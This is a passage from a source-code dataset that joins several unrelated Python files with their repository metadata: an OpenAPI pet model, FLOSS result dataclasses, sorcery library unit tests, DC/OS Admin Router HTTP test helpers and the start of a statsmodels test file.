match='Cannot be invoked to the outside'):
outside.func()
|
goldsberry/sportvu/__init__.py
|
motraor3/py-Goldsberry
| 268 |
129582
|
<reponame>motraor3/py-Goldsberry<filename>goldsberry/sportvu/__init__.py
from goldsberry.sportvu._SportVu2 import *
|
samples/server/petstore/python-blueplanet/app/openapi_server/models/pet.py
|
MalcolmScoffable/openapi-generator
| 11,868 |
129611
|
<gh_stars>1000+
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from app.openapi_server.models.base_model_ import Model
from app.openapi_server.models.category import Category # noqa: F401,E501
from app.openapi_server.models.tag import Tag # noqa: F401,E501
from openapi_server import util
class Pet(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, id: int=None, category: Category=None, name: str=None, photo_urls: List[str]=None, tags: List[Tag]=None, status: str=None): # noqa: E501
"""Pet - a model defined in Swagger
:param id: The id of this Pet. # noqa: E501
:type id: int
:param category: The category of this Pet. # noqa: E501
:type category: Category
:param name: The name of this Pet. # noqa: E501
:type name: str
:param photo_urls: The photo_urls of this Pet. # noqa: E501
:type photo_urls: List[str]
:param tags: The tags of this Pet. # noqa: E501
:type tags: List[Tag]
:param status: The status of this Pet. # noqa: E501
:type status: str
"""
self.swagger_types = {
'id': int,
'category': Category,
'name': str,
'photo_urls': List[str],
'tags': List[Tag],
'status': str
}
self.attribute_map = {
'id': 'id',
'category': 'category',
'name': 'name',
'photo_urls': 'photoUrls',
'tags': 'tags',
'status': 'status'
}
self._id = id
self._category = category
self._name = name
self._photo_urls = photo_urls
self._tags = tags
self._status = status
@classmethod
def from_dict(cls, dikt) -> 'Pet':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The Pet of this Pet. # noqa: E501
:rtype: Pet
"""
return util.deserialize_model(dikt, cls)
@property
def id(self) -> int:
"""Gets the id of this Pet.
:return: The id of this Pet.
:rtype: int
"""
return self._id
@id.setter
def id(self, id: int):
"""Sets the id of this Pet.
:param id: The id of this Pet.
:type id: int
"""
self._id = id
@property
def category(self) -> Category:
"""Gets the category of this Pet.
:return: The category of this Pet.
:rtype: Category
"""
return self._category
@category.setter
def category(self, category: Category):
"""Sets the category of this Pet.
:param category: The category of this Pet.
:type category: Category
"""
self._category = category
@property
def name(self) -> str:
"""Gets the name of this Pet.
:return: The name of this Pet.
:rtype: str
"""
return self._name
@name.setter
def name(self, name: str):
"""Sets the name of this Pet.
:param name: The name of this Pet.
:type name: str
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def photo_urls(self) -> List[str]:
"""Gets the photo_urls of this Pet.
:return: The photo_urls of this Pet.
:rtype: List[str]
"""
return self._photo_urls
@photo_urls.setter
def photo_urls(self, photo_urls: List[str]):
"""Sets the photo_urls of this Pet.
:param photo_urls: The photo_urls of this Pet.
:type photo_urls: List[str]
"""
if photo_urls is None:
raise ValueError("Invalid value for `photo_urls`, must not be `None`") # noqa: E501
self._photo_urls = photo_urls
@property
def tags(self) -> List[Tag]:
"""Gets the tags of this Pet.
:return: The tags of this Pet.
:rtype: List[Tag]
"""
return self._tags
@tags.setter
def tags(self, tags: List[Tag]):
"""Sets the tags of this Pet.
:param tags: The tags of this Pet.
:type tags: List[Tag]
"""
self._tags = tags
@property
def status(self) -> str:
"""Gets the status of this Pet.
pet status in the store # noqa: E501
:return: The status of this Pet.
:rtype: str
"""
return self._status
@status.setter
def status(self, status: str):
"""Sets the status of this Pet.
pet status in the store # noqa: E501
:param status: The status of this Pet.
:type status: str
"""
allowed_values = ["available", "pending", "sold"] # noqa: E501
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}"
.format(status, allowed_values)
)
self._status = status
|
floss/results.py
|
mr-tz/flare-floss
| 2,067 |
129622
|
import datetime
from enum import Enum
from typing import Dict, List
from dataclasses import field
# we use pydantic for dataclasses so that we can
# easily load and validate JSON reports.
#
# pydantic checks all the JSON fields look as they should
# while using the nice and familiar dataclass syntax.
#
# really, you should just pretend we're using stock dataclasses.
from pydantic.dataclasses import dataclass
@dataclass(frozen=True)
class StackString:
"""
here's what the following members represent:
[smaller addresses]
+---------------+ <- stack_pointer (top of stack)
| | \
+---------------+ | offset
| | /
+---------------+
| "abc" | \
+---------------+ |
| | |
+---------------+ | frame_offset
| | |
+---------------+ |
| | /
+---------------+ <- original_stack_pointer (bottom of stack, probably bp)
[bigger addresses]
Attributes:
function: the address of the function from which the stackstring was extracted
string: the extracted string
program_counter: the program counter at the moment the string was extracted
        stack_pointer: the stack pointer at the moment the string was extracted
        original_stack_pointer: the initial stack pointer when the function was entered
        offset: the offset into the stack at which the stack string was found
frame_offset: the offset from the function frame at which the stack string was found
"""
function: int
string: str
program_counter: int
stack_pointer: int
original_stack_pointer: int
offset: int
frame_offset: int
class AddressType(str, Enum):
STACK = "STACK"
GLOBAL = "GLOBAL"
HEAP = "HEAP"
@dataclass(frozen=True)
class DecodedString:
"""
    A decoded string and details about where it was found.
Attributes:
address: address of the string in memory
address_type: type of the address of the string in memory
string: the decoded string
decoded_at: the address at which the decoding routine is called
decoding_routine: the address of the decoding routine
"""
address: int
address_type: AddressType
string: str
decoded_at: int
decoding_routine: int
class StringEncoding(str, Enum):
ASCII = "ASCII"
UTF16LE = "UTF-16LE"
@dataclass(frozen=True)
class StaticString:
"""
A string extracted from the raw bytes of the input.
Attributes:
string: the string
offset: the offset into the input where the string is found
encoding: the string encoding, like ASCII or unicode
"""
string: str
offset: int
encoding: StringEncoding
@dataclass
class Metadata:
file_path: str
imagebase: int = 0
date: datetime.datetime = datetime.datetime.now()
analysis: Dict[str, Dict] = field(default_factory=dict)
enable_stack_strings: bool = True
enable_decoded_strings: bool = True
enable_static_strings: bool = True
@dataclass
class Strings:
stack_strings: List[StackString] = field(default_factory=list)
decoded_strings: List[DecodedString] = field(default_factory=list)
static_strings: List[StaticString] = field(default_factory=list)
@dataclass
class ResultDocument:
metadata: Metadata
strings: Strings = field(default_factory=Strings)
@classmethod
def parse_file(cls, path):
return cls.__pydantic_model__.parse_file(path)
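# A minimal usage sketch (illustrative only, not part of FLOSS): build a report for a
# hypothetical input, write it out as JSON via pydantic's encoder, and load it back with
# parse_file(). The paths "sample.exe" / "report.json" and the example string are assumptions.
if __name__ == "__main__":
    import json
    from pydantic.json import pydantic_encoder
    doc = ResultDocument(metadata=Metadata(file_path="sample.exe"))
    doc.strings.static_strings.append(
        StaticString(string="hello", offset=0x40, encoding=StringEncoding.ASCII)
    )
    with open("report.json", "w") as f:
        json.dump(doc, f, default=pydantic_encoder)
    loaded = ResultDocument.parse_file("report.json")
    assert loaded.strings.static_strings[0].string == "hello"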
|
tests.py
|
alexmojaki/sorcery
| 322 |
129623
|
import ast
import sqlite3
import sys
import traceback
import unittest
from io import StringIO
from time import sleep
from unittest import mock
from littleutils import SimpleNamespace, only
import sorcery as spells
from sorcery import unpack_keys, unpack_attrs, print_args, magic_kwargs, maybe, args_with_source, spell
from sorcery.spells import PYPY
class MyListWrapper(object):
def __init__(self, lst):
self.list = lst
def _make_new_wrapper(self, method_name, *args, **kwargs):
method = getattr(self.list, method_name)
new_list = method(*args, **kwargs)
return type(self)(new_list)
append, extend, clear, __repr__, __str__, __eq__, __hash__, \
__contains__, __len__, remove, insert, pop, index, count, \
sort, __iter__, reverse, __iadd__ = spells.delegate_to_attr('list')
copy, __add__, __radd__, __mul__, __rmul__ = spells.call_with_name(_make_new_wrapper)
class Foo(object):
@magic_kwargs
def bar(self, **kwargs):
return set(kwargs.items()) | {self}
@magic_kwargs
def magic_only_kwarg(n, *, y):
return n, y
class TestStuff(unittest.TestCase):
def test_unpack_keys_basic(self):
obj = SimpleNamespace(thing=SimpleNamespace())
d = dict(foo=1, bar=3, spam=7, baz=8, x=9)
out = {}
foo, obj.thing.spam, obj.bar, out['baz'] = unpack_keys(d)
self.assertEqual(foo, d['foo'])
self.assertEqual(obj.bar, d['bar'])
self.assertEqual(obj.thing.spam, d['spam'])
self.assertEqual(out, {'baz': d['baz']})
def test_unpack_keys_for_loop(self):
results = []
for x, y in unpack_keys([
dict(x=1, y=2),
dict(x=3, z=4),
dict(a=5, y=6),
dict(b=7, c=8),
], default=999):
results.append((x, y))
self.assertEqual(results, [
(1, 2),
(3, 999),
(999, 6),
(999, 999),
])
def test_unpack_keys_list_comprehension(self):
self.assertEqual(
[(y, x) for x, y in unpack_keys([
dict(x=1, y=2),
dict(x=3, y=4),
])],
[
(2, 1),
(4, 3),
])
def test_unpack_keys_bigger_expression(self):
x, y = map(int, unpack_keys(dict(x='1', y='2')))
self.assertEqual(x, 1)
self.assertEqual(y, 2)
def test_unpack_keys_skip_single_assigned_name(self):
x, y = [int(v) for v in unpack_keys(dict(x='1', y='2'))]
self.assertEqual(x, 1)
self.assertEqual(y, 2)
def test_unpack_keys_extras(self):
env = dict(DATABASE_USERNAME='me',
DATABASE_PASSWORD='<PASSWORD>')
username, password = unpack_keys(env, prefix='DATABASE_', swapcase=True)
self.assertEqual(username, 'me')
self.assertEqual(password, '<PASSWORD>')
def test_unpack_attrs(self):
obj = SimpleNamespace(aa='bv', bb='cc', cc='aa')
cc, bb, aa = unpack_attrs(obj)
self.assertEqual(aa, obj.aa)
self.assertEqual(bb, obj.bb)
self.assertEqual(cc, obj.cc)
d, e = unpack_attrs(obj, default=9)
assert d == e == 9
def test_print_args(self):
out = StringIO()
x = 3
y = 4
print_args(x + y,
x * y,
x -
y, file=out)
self.assertEqual('''\
x + y =
7
x * y =
12
x -
y =
-1
''', out.getvalue())
def test_dict_of(self):
a = 1
obj = SimpleNamespace(b=2)
self.assertEqual(spells.dict_of(
a, obj.b,
c=3, d=4
), dict(
a=a, b=obj.b,
c=3, d=4))
def test_no_starargs_in_dict_of(self):
args = [1, 2]
with self.assertRaises(TypeError):
spells.dict_of(*args)
def test_delegation(self):
lst = MyListWrapper([1, 2, 3])
lst.append(4)
lst.extend([1, 2])
lst = (lst + [5]).copy()
self.assertEqual(type(lst), MyListWrapper)
self.assertEqual(lst, [1, 2, 3, 4, 1, 2, 5])
def test_magic_kwargs(self):
foo = Foo()
x = 1
y = 2
w = 10
self.assertEqual(foo.bar(x, y, z=3),
{('x', x), ('y', y), ('z', 3), foo})
self.assertEqual(magic_only_kwarg(x, y), (x, y))
@magic_kwargs
def spam(n, **kwargs):
return n, kwargs
self.assertEqual(spam(x, y, z=5),
(x, dict(y=y, z=5)))
@magic_kwargs
def spam(n, m, **kwargs):
return n, m, kwargs
self.assertEqual(spam(x, w, y, z=5),
(x, w, dict(y=y, z=5)))
with self.assertRaises(TypeError):
@magic_kwargs
def _(a=1):
print(a)
with self.assertRaises(TypeError):
@magic_kwargs
def _(*a):
print(a)
def test_maybe(self):
if PYPY:
with self.assertRaises(NotImplementedError):
maybe(None)
return
n = None
assert maybe(n) is None
self.assertIsNone(maybe(n))
assert maybe(n).a.b.c()[4]().asd.asd()() is None
assert maybe(n)()()() is None
assert maybe(0) == 0
assert maybe({'a': 3})['a'] == 3
assert maybe({'a': {'b': 3}})['a']['b'] == 3
assert maybe({'a': {'b': 3}})['a']['b'] + 2 == 5
assert maybe({'a': {'b': None}})['a']['b'] is None
def test_select_from(self):
conn = sqlite3.connect(':memory:')
c = conn.cursor()
c.execute('CREATE TABLE points (x INT, y INT)')
c.execute("INSERT INTO points VALUES (5, 3), (8, 1)")
conn.commit()
assert [(3, 5), (1, 8)] == [(y, x) for y, x in spells.select_from('points')]
y = 1
x = spells.select_from('points', where=[y])
assert (x, y) == (8, 1)
def test_multiple_attr_calls(self):
x = 3
y = 5
self.assertEqual([
spells.dict_of(x),
spells.dict_of(y),
], [dict(x=x), dict(y=y)])
self.assertEqual([spells.dict_of(x), spells.dict_of(y)],
[dict(x=x), dict(y=y)])
def test_no_assignment(self):
with self.assertRaises(TypeError):
unpack_keys(dict(x=1, y=2))
def test_spell_repr(self):
self.assertRegex(repr(spells.dict_of),
r'Spell\(<function dict_of at 0x.+>\)')
def test_assigned_names(self):
x, y = ['_' + s for s in spells.assigned_names()]
self.assertEqual(x, '_x')
self.assertEqual(y, '_y')
# noinspection PyTrailingSemicolon
def test_semicolons(self):
# @formatter:off
tester(1); tester(2); tester(3)
tester(9
); tester(
8); tester(
99
); tester(33); tester([4,
5, 6, [
7]])
# @formatter:on
def test_args_with_source(self):
self.assertEqual(args_with_source(1 + 2, 3 * 4),
[("1 + 2", 3), ("3 * 4", 12)])
self.assertEqual(
args_with_source(
self.assertEqual(args_with_source(1 + 2), [("1 + 2", 3)])),
[(
'self.assertEqual(args_with_source(1 + 2), [("1 + 2", 3)])',
None,
)],
)
def test_switch(self):
result = spells.switch(2, lambda: {
1: 10,
2: 20,
1 / 0: 1 / 0
})
self.assertEqual(result, 20)
result = spells.switch(2, lambda: {
1: 10,
{{5, 2, 1 / 0}}: 20,
3: 1 / 0
})
self.assertEqual(result, 20)
with self.assertRaises(KeyError):
spells.switch(2, lambda: {
1: 10,
3: 30,
})
result = spells.switch(2, lambda: {
1: 10,
3: 30,
}, default=-1)
self.assertEqual(result, -1)
with self.assertRaises(TypeError):
spells.switch(2, {
1: 10,
2: 20,
})
with self.assertRaises(TypeError):
spells.switch(2, lambda: [{
1: 10,
2: 20,
}])
def test_timeit_in_function(self):
with self.assertRaises(ValueError):
spells.timeit()
def test_decorator(self):
@empty_decorator
@decorator_with_args(tester('123'), x=int())
@tester(list(tuple([1, 2])), returns=empty_decorator)
@tester(
list(
tuple(
[3, 4])),
returns=empty_decorator)
@empty_decorator
@decorator_with_args(
str(),
x=int())
@tester(list(tuple([5, 6])), returns=empty_decorator)
@tester(list(tuple([7, 8])), returns=empty_decorator)
@empty_decorator
@decorator_with_args(tester('sdf'), x=tester('123234'))
def foo():
pass
def test_list_comprehension(self):
str([tester(int(x)) for x in tester([1]) for _ in tester([2]) for __ in [3]])
str([[[tester(int(x)) for x in tester([1])] for _ in tester([2])] for __ in [3]])
return str([(1, [
(2, [
tester(int(x)) for x in tester([1])])
for _ in tester([2])])
for __ in [3]])
def test_lambda(self):
self.assertEqual((lambda x: (tester(x), tester(x)))(tester(3)), (3, 3))
(lambda: (lambda: tester(1))())()
self.assertEqual((lambda: [tester(x) for x in tester([1, 2])])(), [1, 2])
def test_indirect_call(self):
dict(x=tester)['x'](tester)(3)
def test_compound_statements(self):
with self.assertRaises(TypeError):
try:
for _ in tester([2]):
while tester(0):
pass
else:
tester(4)
else:
tester(5)
raise ValueError
except tester(ValueError):
tester(9)
raise TypeError
finally:
tester(10)
# PyCharm getting confused somehow?
# noinspection PyUnreachableCode
str()
with self.assertRaises(tester(Exception)):
if tester(0):
pass
elif tester(0):
pass
elif tester(1 / 0):
pass
def test_generator(self):
def gen():
for x in [1, 2]:
yield tester(x)
gen2 = (tester(x) for x in tester([1, 2]))
assert list(gen()) == list(gen2) == [1, 2]
@spell
def tester(frame_info, arg, returns=None):
result = eval(
compile(ast.Expression(only(frame_info.call.args)), '<>', 'eval'),
frame_info.frame.f_globals,
frame_info.frame.f_locals,
)
assert result == arg, (result, arg)
if returns is None:
return arg
return returns
assert tester([1, 2, 3]) == [1, 2, 3]
def empty_decorator(f):
return f
def decorator_with_args(*_, **__):
return empty_decorator
class TestTimeit(unittest.TestCase):
def patch(self, *args, **kwargs):
patcher = mock.patch(*args, **kwargs)
patcher.start()
self.addCleanup(patcher.stop)
def setUp(self):
self.patch('sorcery.spells._raise', lambda e: e)
self.patch('sys.stdout', StringIO())
def assert_usual_output(self):
self.assertRegex(
sys.stdout.getvalue(),
r"""
Number of trials: 1
Method 1: 1\.\d{3}
Method 2: 1\.\d{3}
Method 1: 1\.\d{3}
Method 2: 1\.\d{3}
Best times:
-----------
Method 1: 1\.\d{3}
Method 2: 1\.\d{3}
""".strip())
def test_no_result(self):
if spells.timeit(repeat=2):
sleep(1)
else:
sleep(1.1)
self.assert_usual_output()
# noinspection PyUnusedLocal
def test_matching_result(self):
if spells.timeit(repeat=2):
sleep(1)
result = 3
else:
sleep(1.1)
result = 3
self.assert_usual_output()
# noinspection PyUnusedLocal
def test_not_matching_result(self):
with self.assertRaises(AssertionError):
if spells.timeit():
result = 3
else:
result = 4
def test_exception(self):
try:
if spells.timeit():
print(1 / 0)
else:
pass
except ZeroDivisionError:
traceback.print_exc(file=sys.stdout)
stdout = sys.stdout.getvalue()
self.assertIn('<timeit-src>', stdout)
self.assertIn('1 / 0', stdout)
if __name__ == '__main__':
unittest.main()
|
packages/adminrouter/extra/src/test-harness/modules/generic_test_code/common.py
|
makkes/dcos
| 2,577 |
129638
|
<filename>packages/adminrouter/extra/src/test-harness/modules/generic_test_code/common.py
# Copyright (C) Mesosphere, Inc. See LICENSE file for details.
import copy
import logging
import os
from contextlib import contextmanager
from http import cookies
from urllib.parse import urljoin
import requests
from mocker.endpoints.mesos import AGENT1_ID
from util import LineBufferFilter
log = logging.getLogger(__name__)
def ping_mesos_agent(ar,
auth_header,
endpoint_id='http://127.0.0.2:15001',
expect_status=200,
agent_id=AGENT1_ID,
timeout=60,
):
"""Test if agent is reachable or not
Helper function meant to simplify checking mesos agent reachability/mesos
agent related testing.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
auth_header (dict): headers dict that contains DC/OS authentication
token. The auth data it contains must be valid.
expect_status (int): HTTP status to expect
endpoint_id (str): if expect_status==200 - id of the endpoint that
should respond to the request
agent_id (str): id of the agent to ping
"""
url = ar.make_url_from_path('/agent/{}/blah/blah'.format(agent_id))
resp = requests.get(url,
allow_redirects=False,
headers=auth_header,
timeout=timeout)
assert resp.status_code == expect_status
if expect_status == 200:
req_data = resp.json()
assert req_data['endpoint_id'] == endpoint_id
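# Hedged usage sketch: how ping_mesos_agent() is typically called from a test. The fixture
# names `master_ar_process` and `valid_user_header` are assumptions made for illustration;
# real tests use whatever AR/auth fixtures the harness provides.
def _example_test_agent_is_reachable(master_ar_process, valid_user_header):
    # defaults: expect HTTP 200, routed to the default agent endpoint
    ping_mesos_agent(master_ar_process, valid_user_header)
    # hypothetical negative case: an unknown agent id asserted against a non-200 status
    ping_mesos_agent(
        master_ar_process,
        valid_user_header,
        agent_id="unknown-agent-id",
        expect_status=404,
    )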
def generic_no_slash_redirect_test(ar, path, code=301, headers=None):
"""Test if request for location without trailing slash is redirected
Helper function meant to simplify writing multiple tests testing the
same thing for different endpoints.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
path (str): path for which request should be made
code (int): expected http redirect code
headers (dict): dictionary containing the headers to send
to the tested AR instance.
"""
url = ar.make_url_from_path(path)
r = requests.get(url, allow_redirects=False, headers=headers)
assert r.status_code == code
# Redirect has trailing slash added and can be absolute or relative
absolute = urljoin(url, r.headers['Location'])
assert absolute == url + '/'
def generic_verify_response_test(
ar,
headers,
path,
assert_headers=None,
assert_headers_absent=None,
assert_status=200):
"""Test if response sent by AR is correct
Helper function meant to simplify writing multiple tests testing the
same thing for different endpoints.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
headers (dict): dictionary containing the headers to send
to the tested AR instance.
path (str): path for which request should be made
assert_headers (dict): additional headers to test where key is the
asserted header name and value is expected value
assert_headers_absent (dict): headers that *MUST NOT* be present in the
response
assert_status (int): expected http status of the response
"""
url = ar.make_url_from_path(path)
resp = requests.get(url,
allow_redirects=False,
headers=headers)
assert resp.status_code == assert_status
if assert_headers is not None:
for name, value in assert_headers.items():
verify_header(resp.headers.items(), name, value)
if assert_headers_absent is not None:
for name in assert_headers_absent:
header_is_absent(resp.headers.items(), name)
def generic_upstream_cookies_verify_test(
ar,
headers,
path,
cookies_to_send=None,
assert_cookies_present=None,
assert_cookies_absent=None):
"""Test if cookies that are passed to the upstream by AR are correct
Helper function meant to simplify writing multiple tests testing the
same thing for different endpoints.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
headers (dict): headers dict that contains DC/OS authentication token
and cookies. The auth data it contains must be valid.
path (str): path for which request should be made
cookies_to_send (dict): dictionary containing all the cookies that should
be sent in the request
assert_cookies_present (dict): cookies to test where key is the
asserted cookie name and value is expected value of the cookie
assert_cookies_absent (list or set): cookies that *MUST NOT* be present
in the upstream request
"""
url = ar.make_url_from_path(path)
resp = requests.get(url,
cookies=cookies_to_send,
allow_redirects=False,
headers=headers)
assert resp.status_code == 200
req_data = resp.json()
# Let's make sure that we got no more than one 'Cookie' header:
# https://tools.ietf.org/html/rfc6265#section-5.4
cookie_headers = []
for header in req_data['headers']:
if header[0] == 'Cookie':
cookie_headers.append(header)
assert len(cookie_headers) <= 1
if len(cookie_headers) == 1:
jar = cookies.SimpleCookie()
# It is a list containing a single tuple (`header name`, `header value`),
# we need the second element of it - the value of the header:
jar.load(cookie_headers[0][1])
else:
jar = {}
if assert_cookies_present is not None:
jar_cookies_dict = {x: jar[x].value for x in jar if x in assert_cookies_present}
# We only want to check the keys present in assert_cookies_present
assert jar_cookies_dict == assert_cookies_present
if assert_cookies_absent is not None:
jar_cookies_set = set(jar.keys())
cookies_absent_set = set(assert_cookies_absent)
assert jar_cookies_set.intersection(cookies_absent_set) == set()
def generic_upstream_headers_verify_test(
ar, auth_header, path, assert_headers=None, assert_headers_absent=None):
"""Test if headers sent upstream are correct
Helper function meant to simplify writing multiple tests testing the
same thing for different endpoints.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
auth_header (dict): headers dict that contains DC/OS authentication
token. The auth data it contains is valid and the request should be
accepted.
path (str): path for which request should be made
assert_headers (dict): additional headers to test where key is the
asserted header name and value is expected value
assert_headers_absent (dict): headers that *MUST NOT* be present in the
upstream request
"""
url = ar.make_url_from_path(path)
resp = requests.get(url,
allow_redirects=False,
headers=auth_header)
assert resp.status_code == 200
req_data = resp.json()
verify_header(req_data['headers'], 'X-Forwarded-For', '127.0.0.1')
verify_header(req_data['headers'], 'X-Forwarded-Proto', 'http')
verify_header(req_data['headers'], 'X-Real-IP', '127.0.0.1')
if assert_headers is not None:
for name, value in assert_headers.items():
verify_header(req_data['headers'], name, value)
if assert_headers_absent is not None:
for name in assert_headers_absent:
header_is_absent(req_data['headers'], name)
def generic_correct_upstream_dest_test(ar, headers, path, endpoint_id):
"""Test if upstream request has been sent to correct upstream
Helper function meant to simplify writing multiple tests testing the
same thing for different endpoints.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
headers (dict): dictionary containing the headers to send
to the tested AR instance.
path (str): path for which request should be made
endpoint_id (str): id of the endpoint where the upstream request should
have been sent
"""
url = ar.make_url_from_path(path)
resp = requests.get(url,
allow_redirects=False,
headers=headers)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['endpoint_id'] == endpoint_id
def generic_correct_upstream_request_test(
ar, headers, given_path, expected_path, http_ver='HTTP/1.0'):
"""Test if path component of the request sent upstream is correct.
Helper function meant to simplify writing multiple tests testing the
same thing for different endpoints.
Arguments:
ar: Admin Router object, an instance of runner.(ee|open).Nginx
headers (dict): dictionary containing the headers to send
to the tested AR instance.
given_path (str): path for which request should be made
expected_path (str): path that is expected to be sent to upstream
http_ver (str): http version string that the upstream request should be
made with
"""
h = copy.deepcopy(headers)
if http_ver == 'HTTP/1.1':
# In case of HTTP/1.1 connections, we also need to test if Connection
# header is cleared.
h['Connection'] = 'close'
elif http_ver == 'websockets':
h['Connection'] = 'close'
h['Upgrade'] = 'Websockets'
url = ar.make_url_from_path(given_path)
resp = requests.get(url,
allow_redirects=False,
headers=h)
assert resp.status_code == 200
req_data = resp.json()
assert req_data['method'] == 'GET'
assert req_data['path'] == expected_path
if http_ver == 'HTTP/1.1':
header_is_absent(req_data['headers'], 'Connection')
assert req_data['request_version'] == 'HTTP/1.1'
elif http_ver == 'websockets':
verify_header(req_data['headers'], 'Connection', 'upgrade')
verify_header(req_data['headers'], 'Upgrade', 'Websockets')
assert req_data['request_version'] == 'HTTP/1.1'
else:
assert req_data['request_version'] == http_ver
def generic_location_header_during_redirect_is_adjusted_test(
ar,
mocker,
headers,
endpoint_id,
basepath,
location_set,
location_expected,
):
"""Test if the `Location` header is rewritten by AR on redirect.
This generic test issues a request to AR for a given path and verifies that
redirect has occurred with the `Location` header contents equal to
`location_expected` argument.
Arguments:
mocker (Mocker): instance of the Mocker class, used for controlling
upstream HTTP endpoint/mock
ar: Admin Router object, an instance of `runner.(ee|open).Nginx`.
headers (dict): dictionary containing the headers to send
to the tested AR instance.
endpoint_id (str): id of the endpoint where the upstream request should
have been sent.
basepath (str): the URI used by the test harness to issue the request
to AR, and to which we are expecting AR to respond with rewritten
`Location` header redirect.
location_set (str): upstream will send the response with the `Location`
header set to this value.
location_expected (str): the expected value of the `Location` header
after being rewritten/adjusted by AR.
"""
mocker.send_command(endpoint_id=endpoint_id,
func_name='always_redirect',
aux_data=location_set)
url = ar.make_url_from_path(basepath)
r = requests.get(url, allow_redirects=False, headers=headers)
assert r.status_code == 307
# if Location is relative, make it absolute
absolute = urljoin(url, r.headers['Location'])
assert absolute == location_expected
def header_is_absent(headers, header_name):
"""Test if given header is present in the request headers list
Arguments:
headers (list): list of tuples containing all the headers present in
the reflected request data
header_name (string): name of the header that should not be present/must
not be set.
Raises:
AssertionError: header with the name "header_name" was found in
supplied header list.
"""
for header in headers:
assert header[0] != header_name
def verify_header(headers, header_name, header_value):
"""Asserts that particular header exists and has correct value.
Helper function for checking if header with given name has been defined
with correct value in given headers list. The headers list is in format
defined by requests module.
Presence of more than one header with given name or incorrect value raises
assert statement.
Args:
header_name (str): header name to seek
header_value (str): expected value of the header
headers (obj: [('h1', 'v1'), ('h2', 'v2'), ...]): a list of header
name-val tuples
Raises:
AssertionError: header has not been found, there is more than one header
with given name or header has incorrect value
"""
matching_headers = list()
for header in headers:
if header[0] == header_name:
matching_headers.append(header)
# Build a descriptive error message before asserting that exactly one match was found
if len(matching_headers) != 1:
if len(matching_headers) == 0:
msg = "Header `{}` has not been found".format(header_name)
elif len(matching_headers) > 1:
msg = "More than one `{}` header has been found".format(header_name)
assert len(matching_headers) == 1, msg
assert matching_headers[0][1] == header_value
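# Tiny self-contained illustration (hypothetical header values) of the two helpers above;
# both operate on a list of (name, value) tuples, i.e. the format reflected back by the
# mock upstream endpoints used in these tests.
def _example_header_assertions():
    example_headers = [("X-Real-IP", "127.0.0.1"), ("Host", "example.com")]
    verify_header(example_headers, "X-Real-IP", "127.0.0.1")  # exactly one match, expected value
    header_is_absent(example_headers, "Authorization")  # no such header present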
def assert_endpoint_response(
ar,
path,
code,
assert_error_log=None,
headers=None,
cookies=None,
assertions=None
):
"""Asserts response code and log messages in Admin Router stderr for
request against specified path.
Arguments:
ar (Nginx): Running instance of the AR
path (str): path for which the request should be made
code (int): Expected response code
assert_error_log (dict): LineBufferFilter compatible definition of messages
to assert
cookies (dict): Optionally provide request cookies
headers (dict): Optionally provide request headers
assertions (List[lambda r]): Optionally provide additional assertions
for the response
"""
def body():
r = requests.get(
ar.make_url_from_path(path),
headers=headers,
cookies=cookies,
)
assert r.status_code == code
if assertions:
for func in assertions:
assert func(r)
if assert_error_log is not None:
# for testing, log messages go to both stderr and to /dev/log
with LineBufferFilter(
copy.deepcopy(assert_error_log), line_buffer=ar.stderr_line_buffer
) as stderr:
with LineBufferFilter(
assert_error_log, line_buffer=ar.syslog_line_buffer
) as syslog:
body()
assert stderr.extra_matches == {}
assert syslog.extra_matches == {}
else:
body()
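# Hedged usage sketch for assert_endpoint_response(): the fixture name `master_ar_process`
# and the path below are assumptions for illustration only.
def _example_assert_unauthenticated_request_is_rejected(master_ar_process):
    assert_endpoint_response(
        master_ar_process,
        '/exhibitor/',  # hypothetical authenticated path
        401,
        assertions=[lambda r: 'WWW-Authenticate' in r.headers],
    )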
@contextmanager
def overridden_file_content(file_path, new_content=None):
"""Context manager meant to simplify static files testsing
While inside the context, file can be modified and/or modified content
may be injected by the context manager itself. Right after context is
exited, the original file contents are restored.
Arguments:
file_path: path to the file that should be "guarded"
new_content: new content for the file. If None, the file contents are not
changed; `str` objects are encoded to bytes first, assuming utf-8 encoding.
"""
if new_content is not None and not isinstance(new_content, bytes):
new_content = new_content.encode('utf-8')
with open(file_path, 'rb+') as fh:
old_content = fh.read()
if new_content is not None:
fh.seek(0)
fh.write(new_content)
fh.truncate()
yield
with open(file_path, 'wb') as fh:
fh.write(old_content)
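# Hedged usage sketch for overridden_file_content(): the path below is an assumption for
# illustration; in the real tests it points at a static file served by Admin Router.
def _example_overridden_file_content():
    with overridden_file_content("/tmp/example-served-file.html", "maintenance page"):
        # while inside the context the file holds the injected content ...
        with open("/tmp/example-served-file.html") as fh:
            assert fh.read() == "maintenance page"
    # ... and the original contents are restored on exit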
def repo_is_ee():
"""Determine the flavour of the repository
Return:
True if repository is EE
"""
cur_dir = os.path.dirname(__file__)
ee_tests_dir = os.path.abspath(os.path.join(cur_dir, "..", "..", "tests", "ee"))
open_tests_dir = os.path.abspath(os.path.join(cur_dir, "..", "..", "tests", "open"))
is_ee = os.path.isdir(ee_tests_dir) and not os.path.isdir(open_tests_dir)
is_open = os.path.isdir(open_tests_dir) and not os.path.isdir(ee_tests_dir)
assert is_ee or is_open, "Unable to determine the variant of the repo"
return is_ee
|
venv/Lib/site-packages/statsmodels/stats/tests/test_statstools.py
|
EkremBayar/bayar
| 6,931 |
129645
|
<gh_stars>1000+
# TODO: Test robust skewness
# TODO: Test robust kurtosis
import numpy as np
import pandas as pd
from numpy.testing import (assert_almost_equal, assert_raises, assert_equal,
assert_allclose)
from statsmodels.stats._adnorm import normal_ad
from statsmodels.stats.stattools import (omni_normtest, jarque_bera,
durbin_watson, _medcouple_1d, medcouple,
robust_kurtosis, robust_skewness)
# a random array, rounded to 4 decimals
